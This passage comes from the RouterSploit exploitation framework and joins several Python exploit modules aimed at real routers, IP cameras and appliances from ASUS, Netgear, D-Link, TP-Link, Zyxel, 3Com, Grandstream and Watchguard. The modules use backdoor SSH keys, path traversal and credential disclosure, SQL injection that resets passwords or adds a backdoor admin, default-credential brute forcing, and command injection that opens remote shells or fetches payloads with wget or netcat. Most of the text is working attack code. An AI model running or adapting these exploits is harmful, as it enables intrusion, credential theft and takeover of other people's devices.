            "https://www.kb.cert.org/vuls/id/662676",
            "http://packetstormsecurity.com/files/125755/quantum-root.txt",
            "https://github.com/mitchellh/vagrant/tree/master/keys",
            "https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials",
        ),
        "devices": (
            "ExaGrid firmware < 4.8 P26",
            "Quantum DXi V1000",
            "Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances",
            "Barracuda Load Balancer",
            "Ceragon FibeAir IP-10",
            "F5 BigIP",
            "Loadbalancer.org Enterprise VA 7.5.2",
            "Digital Alert Systems DASDEC and Monroe Electronics One-Net E189 Emergency Alert System",
            "Vagrant",
        ),
    }
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(22, "Target SSH port")

    def __init__(self):
        self.valid = None
        self.private_keys = []

        ssh_keys_path = os.path.join(utils.RESOURCES_DIR, "ssh_keys")
        ssh_keys = [".".join(filename.split(".")[:-1]) for filename in os.listdir(ssh_keys_path) if filename.endswith(".json")]

        for ssh_key in ssh_keys:
            path = "{}/{}.json".format(ssh_keys_path, ssh_key)
            with open(path, "r") as f:
                data = json.load(f)

            path = "{}/{}.key".format(ssh_keys_path, ssh_key)
            with open(path, "r") as f:
                data["priv_key"] = f.read()

            self.private_keys.append(data)

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            ssh_client = self.ssh_create()
            if ssh_client.login_pkey(self.valid["username"], self.valid["priv_key"]):
                ssh_client.interactive()
                ssh_client.close()
            else:
                print_error("Exploit failed - target seems to be not vulnerable")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        for key in self.private_keys:
            ssh_client = self.ssh_create()
            if ssh_client.login_pkey(key["username"], key["priv_key"]):
                ssh_client.close()
                self.valid = key
                return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com AP8760 Password Disclosure",
        "description": "Exploits 3Com AP8760 password disclosure vulnerability."
                       "If the target is vulnerable it is possible to fetch credentials for administration user.",
        "authors": (
            "Richard Brain",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.procheckup.com/procheckup-labs/pr07-40/",
        ),
        "devices": (
            "3Com AP8760",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        creds = []

        print_status("Sending payload request")
        response = self.http_request(
            method="GET",
            path="/s_brief.htm",
        )

        if response is None:
            return

        print_status("Extracting credentials")
        username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
        password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)

        if len(username) and len(password):
            print_success("Exploit success")
            creds.append((username[0], password[0]))
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Exploit failed - could not extract credentials")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/s_brief.htm",
        )
        if response is None:
            return False  # target is not vulnerable

        if "szUsername" in response.text and "szPassword" in response.text:
            return True  # target is vulnerable

        return False  # target not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com IMC Path Traversal",
        "description": "Exploits 3Com Intelligent Management Center path traversal vulnerability. "
                       "If the target is vulnerable it is possible to read file from the filesystem.",
        "authors": (
            "Richard Brain",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/12679/",
        ),
        "devices": (
            "3Com Intelligent Management Center",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    filename = OptString("\\windows\\win.ini", "File to read from the filesystem")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            print_status("Sending paylaod request")

            path = "/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\\..\\..\\..\\..\\..\\..\\..\\..\\..{}".format(self.filename)
            response = self.http_request(
                method="GET",
                path=path,
            )

            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading {} file".format(self.filename))
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini",
        )

        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "[fonts]" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com IMC Info Disclosure",
        "description": "Exploits 3Com Intelligent Management Center information disclosure vulnerability that allows to fetch credentials for SQL sa account",
        "authors": (
            "Richard Brain",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/12680/",
        ),
        "devices": (
            "3Com Intelligent Management Center",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def __init__(self):
        self.paths = [
            "/imc/reportscript/sqlserver/deploypara.properties",
            "/rpt/reportscript/sqlserver/deploypara.properties",
            "/imc/reportscript/oracle/deploypara.properties"
        ]

        self.valid = None

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            print_status("Sending request to download sensitive information")
            response = self.http_request(
                method="GET",
                path=self.valid,
            )

            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_status("Reading {}".format(self.valid))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")

        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        for path in self.paths:
            response = self.http_request(
                method="GET",
                path=path,
            )
            if response is None:
                continue

            if any(map(lambda x: x in response.text, ["report.db.server.name", "report.db.server.sa.pass", "report.db.server.user.pass"])):
                self.valid = path
                return True  # target is vulnerable

        return False  # target not vulnerable



from routersploit.core.exploit import *
from routersploit.core.telnet.telnet_client import TelnetClient


class Exploit(TelnetClient):
    __info__ = {
        "name": "Grandsteam GXV3611 HD - SQL Injection",
        "description": "Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. "
                       "After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it.",
        "authors": (
            "pizza1337",       # exploit author
            "Joshua Abraham",  # routesploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40441/",
            "http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html",
        ),
        "devices": (
            "Grandstream GXV3611 HD",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(23, "Target Telnet port")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable...")

            telnet_client = self.telnet_create()
            telnet_client.connect()

            telnet_client.read_until(tn, "Username: ")
            telnet_client.write("';update user set password='a';--\r\n")  # This changes all the passwords to 'a'
            telnet_client.read_until("Password: ")
            telnet_client.write("nothing\r\n")
            telnet_client.read_until("Username: ")
            telnet_client.write("admin\r\n")
            telnet_client.read_until("Password: ")
            telnet_client.write("a\r\n")  # Login with the new password
            telnet_client.read_until("> ")
            telnet_client.write("!#/ port lol\r\n")  # Backdoor command triggers telnet server to startup.
            telnet_client.read_until("> ")
            telnet_client.write("quit\r\n")
            telnet_client.close()

            print_success("SQLI successful, going to telnet into port 20000 "
                          "with username root and no password to get shell")

        else:
            print_error("Exploit failed. Target does not appear vulnerable")

    @mute
    def check(self):
        telnet_client = self.telnet_create()
        telnet_client.connect()

        res = telnet_client.read_until("login:")
        if res and "Grandstream" in res:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.bluetooth.btle_client import BTLEClient


class Exploit(BTLEClient):
    __info__ = {
        "name": "Bluetooth LE Write",
        "description": "Writes data to target Bluetooth Low Energy device to given "
                       "characteristic.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/",
        ),
    }

    target = OptMAC("", "Target MAC address")
    char = OptString("", "Characteristic")
    data = OptString("41424344", "Data (in hex format)")
    buffering = OptBool(True, "Buffering enabled: true/false. Results in real time.")

    def run(self):
        try:
            data = bytes.fromhex(self.data)
        except ValueError:
            print_error("Data is not in valid format")
            return

        res = self.btle_scan(self.target)
        if res:
            device = res[0]
            device.write(self.char, data)



class RoutersploitException(Exception):
    def __init__(self, msg: str = ""):
        super(RoutersploitException, self).__init__(msg)


class OptionValidationError(RoutersploitException):
    pass


class StopThreadPoolExecutor(RoutersploitException):
    pass



from struct import pack, unpack
from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient


class Exploit(UDPClient):
    __info__ = {
        "name": "Asus Infosvr Backdoor RCE",
        "description": "Module exploits remote command execution in multiple ASUS devices. If the target is "
                       "vulnerable, command loop is invoked that allows executing commands on operating system level.",
        "authors": (
            "Joshua 'jduck' Drake; @jduck",  # vulnerability discovery
            "Friedrich Postelstorfer",  # original Python exploit
            "Michal Bentkowski; @SecurityMB",  # routersploit module
        ),
        "references": (
            "https://github.com/jduck/asus-cmd",
        ),
        "devices": (
            "ASUS RT-N66U",
            "ASUS RT-AC87U",
            "ASUS RT-N56U",
            "ASUS RT-AC68U",
            "ASUS DSL-N55U",
            "ASUS DSL-AC68U",
            "ASUS RT-AC66R",
            "ASUS RT-AC66R",
            "ASUS RT-AC55U",
            "ASUS RT-N12HP_B1",
            "ASUS RT-N16",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(9999, "Target UDP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("Please note that only first 256 characters of the "
                         "output will be displayed or use reverse_tcp")
            shell(self, architecture="armle", method="wget", location="/tmp")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        if len(cmd) > 237:
            print_error('Your command must be at most 237 characters long. Longer strings might crash the server.')
            return

        ibox_comm_pkt_hdr_ex = (
            pack("<B", 0x0c) +                      # NET_SERVICE_ID_IBOX_INFO 0xC
            pack("<B", 0x15) +                      # NET_PACKET_TYPE_CMD 0x15
            pack("<H", 0x33) +                      # NET_CMD_ID_MANU_CMD 0x33
            bytes(utils.random_text(4), "utf-8") +  # INFO
            bytes(utils.random_text(6), "utf-8") +  # MAC Address
            bytes(utils.random_text(32), "utf-8")   # Password
        )

        cmd = bytes(cmd, "utf-8") + pack("<B", 0x00)
        pkt_syscmd = (
            pack("<H", len(cmd)) +
            cmd
        )

        payload = ibox_comm_pkt_hdr_ex + pkt_syscmd + bytes(utils.random_text(512 - len(ibox_comm_pkt_hdr_ex + pkt_syscmd)), "utf-8")

        udp_client = self.udp_create()
        udp_client.send(payload)
        response = udp_client.recv(512)
        udp_client.close()

        if response and len(response) == 512:
            length = unpack('<H', response[14:16])[0]
            return str(response[16: 16 + length], "utf-8")

        return ""

    @mute
    def check(self):
        NUM_CHECKS = 5  # we try 5 times because the exploit tends to be unstable

        for _ in range(NUM_CHECKS):
            random_value = utils.random_text(32)
            cmd = "echo {}".format(random_value)
            retval = self.execute(cmd)

            if random_value in retval:
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.modules.creds.generic.ssh_default import Exploit as SSHDefault


class Exploit(SSHDefault):
    __info__ = {
        "name": "Zyxel Router Default SSH Creds",
        "description": "Module performs dictionary attack against Zyxel Router SSH service. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Zyxel Router",
        ),
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(22, "Target SSH port")

    threads = OptInteger(1, "Number of threads")
    defaults = OptWordlist("admin:admin,admin:1234,admin:user,admin:Zyxel*2012*", "User:Pass or file with default credentials (file://)")



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Netgear ProSafe RCE",
        "description": "Module exploits remote command execution vulnerability in Netgear ProSafe "
                       "WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.",
        "authors": (
            "Andrei Costin <andrei[at]firmware.re>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://firmware.re/vulns/acsa-2015-002.php",
            "https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf",
        ),
        "devices": (
            "Netgear ProSafe WC9500",
            "Netgear ProSafe WC7600",
            "Netgear ProSafe WC7520",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self)
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        mark = utils.random_text(32)
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo {}'.format(cmd, mark)

        response = self.http_request(
            method="POST",
            path="/login_handler.php",
            headers=headers,
            data=data
        )

        if response is None:
            return ""

        if mark in response.text:
            regexp = "(|.+?){}".format(mark)
            res = re.findall(regexp, response.text, re.DOTALL)

            if len(res):
                return res[0]

        return ""

    @mute
    def check(self):
        mark = utils.random_text(32)
        cmd = "echo {}".format(mark)

        response = self.execute(cmd)

        if mark in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from random import randint
import hashlib

from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """
    This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
    appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
    remote attacker may insert a valid web user into the appliance database, and get access
    to the web interface. On the other hand, a vulnerability in the web interface allows the
    attacker to inject operating system commands as the 'nobody' user.
    """
    __info__ = {
        'name': 'Watchguard XCS Remote Command Execution',
        'description': 'This module exploits two separate vulnerabilities found in the Watchguard XCS virtual'
        'appliance to gain command execution. By exploiting an unauthenticated SQL injection, a '
        'remote attacker may insert a valid web user into the appliance database, and get access '
        'to the web interface. On the other hand, a vulnerability in the web interface allows the '
        'attacker to inject operating system commands as the "nobody" user.',
        'authors': [
            'Daniel Jensen <daniel.jensen[at]security-assessment.com>',  # discovery and Metasploit module
            'GH0st3rs',  # routersploit module
        ],
        'references': [
            'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf',
            'https://vulners.com/metasploit/MSF:EXPLOIT/FREEBSD/HTTP/WATCHGUARD_CMD_EXEC?utm_source=telegram&utm_medium=vulnersBot&utm_campaign=search'
        ],
        'devices': [
            'Watchguard XCS 9.2/10.0',
        ],
    }

    target = OptIP('', 'Target address e.g. 192.168.1.1')
    port = OptPort(443, 'WatchGuard WebUI port')
    watchguard_user = OptString(utils.random_text(8), 'Web interface user account to add')
    watchguard_password = OptString(utils.random_text(8), 'Web interface user password')

    def run(self):
        if self.check():
            # Get a valid session by logging in or exploiting SQLi to add user
            print_status('Getting a valid session...')
            self.sid = self.get_session()
            if not self.sid:
                print_error("Exploit failed - target seems to be not vulnerable")
                return False
            print_success('Successfully logged in')

            # Check if cmd injection works
            test_cmd_inj = self.send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
            if not test_cmd_inj or 'uid=65534' not in test_cmd_inj.text:
                print_error('Could not inject command, may not be vulnerable')
                return

            # We have cmd exec, stand up an HTTP server and deliver the payload
            print_status('Getting ready to drop binary on appliance')

            # Generate payload
            shell(self,
                  architecture="x64",
                  method="netcat",
                  # payloads=["netcat_bind_tcp", "netcat_reverse_tcp"]
                  )
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        header = {
            'cookie': "sid=1'",
        }
        response = self.http_request(
            method='GET',
            path='/borderpost/imp/compose.php3',
            headers=header
        )
        if response and 'unterminated quoted string' in response.text:
            return True  # target is vulnerable
        return False  # target is not vulnerable

    def attempt_login(self, username, pwd_clear):
        # Attempts to login with the provided user credentials
        # Get the login page
        get_login_hash = self.http_request(
            method="GET",
            path='/login.spl'
        )

        if not get_login_hash or not get_login_hash.context:
            print_error('Could not get login page.')
            return False

        # Find the hash token needed to login
        login_hash = ''
        for line in get_login_hash.text.splitlines():
            login_hash = re.findall('name="hash" value="(.*)"', line)
            if login_hash:
                login_hash = login_hash[0]
                break
            else:
                login_hash = ''

        sid_cookie = re.findall(r'sid=(\w+);', get_login_hash.headers['cookie'] or '')[0] or ''
        if login_hash == '' or sid_cookie == '':
            print_error('Could not find login hash or cookie')
            return False

        login_post = {
            'u': username,
            'pwd': pwd_clear,
            'hash': login_hash,
            'login': 'Login'
        }
        print_status('Attempting to login with provided credentials')
        login = self.http_request(
            method='POST',
            path='/login.spl?f=V',
            headers={
                'cookie': "sid={sid_cookie}".format(sid_cookie=sid_cookie)
            },
            data=login_post
        )

        if login and '<title>Loading...</title>' in login.text:
            return sid_cookie

        return False

    def add_user(self, user_id, username, pwd_hash, pwd_clear):
        # Adds a user to the database using the unauthed SQLi
        cookie_str = "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES({user_id}, '{username}', '{pwd_hash}', 0, 'server_admin', 0, 0)--"
        response = self.http_request(
            method='GET',
            path='/borderpost/imp/compose.php3',
            headers={
                'cookie': cookie_str.format(user_id=user_id, username=username, pwd_hash=pwd_hash)
            }
        )

        if not response or not response.text:
            print_error("Could not connect to host")
            return False

        if 'ERROR:  duplicate key value violates unique constraint' in response.text:
            print_status("Added backdoor user, credentials => {username}:{pwd_clear}".format(
                username=username,
                pwd_clear=pwd_clear
            ))
        else:
            return False

        return True

    def generate_device_hash(self, cleartext_password):
        # Generates the specific hashes needed for the XCS
        pre_salt = b'BorderWare '
        post_salt = b' some other random (9) stuff'
        hash_tmp = hashlib.md5(pre_salt + cleartext_password.encode() + post_salt).hexdigest()
        final_hash = hashlib.md5(cleartext_password.encode() + hash_tmp.encode()).hexdigest()
        return final_hash

    def send_cmd_exec(self, uri, os_cmd):
        # This is a handler function that makes HTTP calls to exploit the command injection issue
        if not self.sid:
            print_error('Missing a session cookie when attempting to execute command.')
            return False

        header = {'cookie': "sid={sid}".format(sid=self.sid)}

        response = self.http_request(
            method='GET',
            path='{uri}?f=dnld&id=;{os_cmd}'.format(uri=uri, os_cmd=os_cmd),
            headers=header
        )

        return response

    def get_session(self):
        # Gets a valid login session, either valid creds or the SQLi vulnerability
        username = self.watchguard_user
        password = self.watchguard_password
        user_id = randint(10, 999)

        sid_cookie = self.attempt_login(username, password)
        if sid_cookie:
            return sid_cookie

        print_error('Failed to login, attempting to add backdoor user...')
        pwd_hash = self.generate_device_hash(password)

        if not self.add_user(user_id, username, pwd_hash, password):
            print_error('Failed to add user account to database.')
            return False

        sid_cookie = self.attempt_login(username, password)
        if not sid_cookie:
            print_error('Unable to login with user account.')
            return False

        return sid_cookie

    # Make the server download the payload and run it
    def execute(self, cmd):
        print_status('Sending the payload to the server...')
        print_status("Telling appliance to run {cmd}".format(cmd=cmd))
        response = self.send_cmd_exec('/ADMIN/mailqueue.spl', cmd)
        if response:
            return ""
        return False



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DCS-930L Auth RCE",
        "description": "Module exploits D-Link DCS-930L Remote Code Execution vulnerability which allows executing command on the device.",
        "authors": (
            "Nicholas Starke <nick[at]alephvoid.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/39437/",
        ),
        "devices": (
            "D-Link DCS-930L",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username to log in with")
    password = OptString("", "Password to log in with")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection, response is not available")
            shell(self, architecture="mipsle")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
        data = {
            "ReplySuccessPage": "docmd.htm",
            "ReplyErrorPage": "docmd.htm",
            "SystemCommand": cmd,
            "ConfigSystemCommand": "Save"
        }

        self.http_request(
            method="POST",
            path="/setSystemCommand",
            headers=headers,
            data=data,
            auth=(self.username, self.password)
        )

        return ""

    @mute
    def check(self):
        headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}
        data = {
            "ReplySuccessPage": "docmd.htm",
            "ReplyErrorPage": "docmd.htm",
            "SystemCommand": "ls",
            "ConfigSystemCommand": "Save"
        }

        response = self.http_request(
            method="POST",
            path="/setSystemCommand",
            headers=headers,
            data=data,
            auth=(self.username, self.password),
        )

        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and "ConfigSystemCommand" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable



from struct import pack, unpack
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
from routersploit.core.udp.udp_client import UDPClient


class Exploit(HTTPClient, UDPClient):
    __info__ = {
        "name": "AsusWRT Lan RCE",
        "description": "Module exploits multiple vulnerabilities to achieve remote code execution in AsusWRT firmware. "
                       "The HTTP server contains vulnerability that allows bypass authentication via POST requests. "
                       "Combining this with another vulnerability in the VPN configuration upload functionality allows "
                       "setting NVRAM configuration variables directly from the POST request. By setting nvram variable "
                       "ateCommand_flag to 1 it is possible to enable special command mode which allows executing commands "
                       "via infosvr server listening on port UDP 9999. Module was tested on Asus RT-AC68U 3.0.0.4.380_7378.",
        "authors": (
            "Pedro Ribeiro <pedrib@gmail.com>",  # vulnerability discovery and metasploit module
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://nvd.nist.gov/vuln/detail/CVE-2018-5999",
            "https://nvd.nist.gov/vuln/detail/CVE-2018-6000",
            "https://blogs.securiteam.com/index.php/archives/3589",
            "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt",
            "http://seclists.org/fulldisclosure/2018/Jan/78",
        ),
        "devices": (
            "AsusWRT < v3.0.0.4.384.10007",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    infosvr_port = OptPort(9999, "Target InfoSVR Port")

    def run(self):
        response = self.http_request(
            method="POST",
            path="/vpnupload.cgi",
            files={"ateCommand_flag": "1"},
        )

        if response and response.status_code == 200:
            print_success("Successfuly set ateCommand_flag variable")
        else:
            print_error("Failed to set ateCommand_flag variable")
            return

        shell(self, architecture="armle", method="wget", location="/tmp")

    def execute(self, cmd):
        ibox_comm_pkt_hdr_ex = (
            pack("<B", 0x0c) +                      # NET_SERVICE_ID_IBOX_INFO 0xC
            pack("<B", 0x15) +                      # NET_PACKET_TYPE_CMD 0x15
            pack("<H", 0x33) +                      # NET_CMD_ID_MANU_CMD 0x33
            bytes(utils.random_text(4), "utf-8") +  # INFO
            bytes(utils.random_text(6), "utf-8") +  # MAC Address
            bytes(utils.random_text(32), "utf-8")   # Password
        )

        cmd = bytes(cmd, "utf-8") + pack("<B", 0x00)
        pkt_syscmd = (
            pack("<H", len(cmd)) +
            cmd
        )

        payload = ibox_comm_pkt_hdr_ex + pkt_syscmd + bytes(utils.random_text(512 - len(ibox_comm_pkt_hdr_ex + pkt_syscmd)), "utf-8")

        udp_client = self.udp_create(port=self.infosvr_port)
        udp_client.send(payload)
        response = udp_client.recv(512)
        udp_client.close()

        if response and len(response) == 512:
            length = unpack('<H', response[14:16])[0]
            return str(response[16: 16 + length], "utf-8")

        return ""

    @mute
    def check(self):
        return None



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Zyxel Eir D1000 RCE",
        "description": "Module exploits Remote Command Execution vulnerability in Zyxel/Eir D1000 devices. "
                       "If the target is vulnerable it allows to execute commands on operating system level.",
        "authors": (
            "kenzo",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/",
            "https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759",
            "https://broadband-forum.org/technical/download/TR-064.pdf",
        ),
        "devices": (
            "Zyxel EIR D1000",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
    port = OptPort(7547, 'Target HTTP port')

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target seems to be not vulnerable")

    def execute(self, cmd):
        headers = {
            "Content-Type": "text/xml",
            "SOAPAction": "urn:dslforum-org:service:Time:1#SetNTPServers"
        }

        data = ("<?xml version=\"1.0\"?>"
                "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
                " <SOAP-ENV:Body>"
                "  <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
                "   <NewNTPServer1>`{}`</NewNTPServer1>"  # injection
                "   <NewNTPServer2></NewNTPServer2>"
                "   <NewNTPServer3></NewNTPServer3>"
                "   <NewNTPServer4></NewNTPServer4>"
                "   <NewNTPServer5></NewNTPServer5>"
                "  </u:SetNTPServers>"
                " </SOAP-ENV:Body>"
                "</SOAP-ENV:Envelope>").format(cmd)

        self.http_request(
            method="POST",
            path="/UD/act?1",
            headers=headers,
            data=data,
        )

        return ""

    @mute
    def check(self):  # todo: requires improvement
        response = self.http_request(
            method="GET",
            path="/globe"
        )

        if response is not None:
            if response.status_code == 404 and "home_wan.htm" in response.text:
                return True  # target is vulnerable

        return False  # target is not vulnerable



import re
from urllib.parse import quote
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "TP-Link WDR740ND & WDR740N Backdoor RCE",
        "description": "Exploits TP-Link WDR740ND and WDR740N backdoor vulnerability that allows "
                       "executing commands on operating system level.",
        "authors": (
            "websec.ca",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://websec.ca/advisories/view/root-shell-tplink-wdr740",
        ),
        "devices": (
            "TP-Link WDR740ND",
            "TP-Link WDR740N",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username to log in with")
    password = OptString("admin", "Password to log in with")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command shell")
            shell(self)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        cmd = quote(cmd)

        path = "/userRpm/DebugResultRpm.htm?cmd={}&usr=osteam&passwd=5up".format(cmd)

        response = self.http_request(
            method="GET",
            path=path,
            auth=(self.username, self.password)
        )
        if response is None:
            return ""

        if response.status_code == 200:
            regexp = r'var cmdResult = new Array\(\n"(.*?)",\n0,0 \);'
            res = re.findall(regexp, response.text)

            if len(res):
                # hard to extract response
                return "\n".join(res[0].replace("\\r\\n", "\r\n").split("\n"))

        return ""

    @mute
    def check(self):
        marker = utils.random_text(32)
        cmd = "echo {}".format(marker)

        response = self.execute(cmd)

        if marker in response:
            return True  # target is vulnerable

        return False  # target is not vulnerable
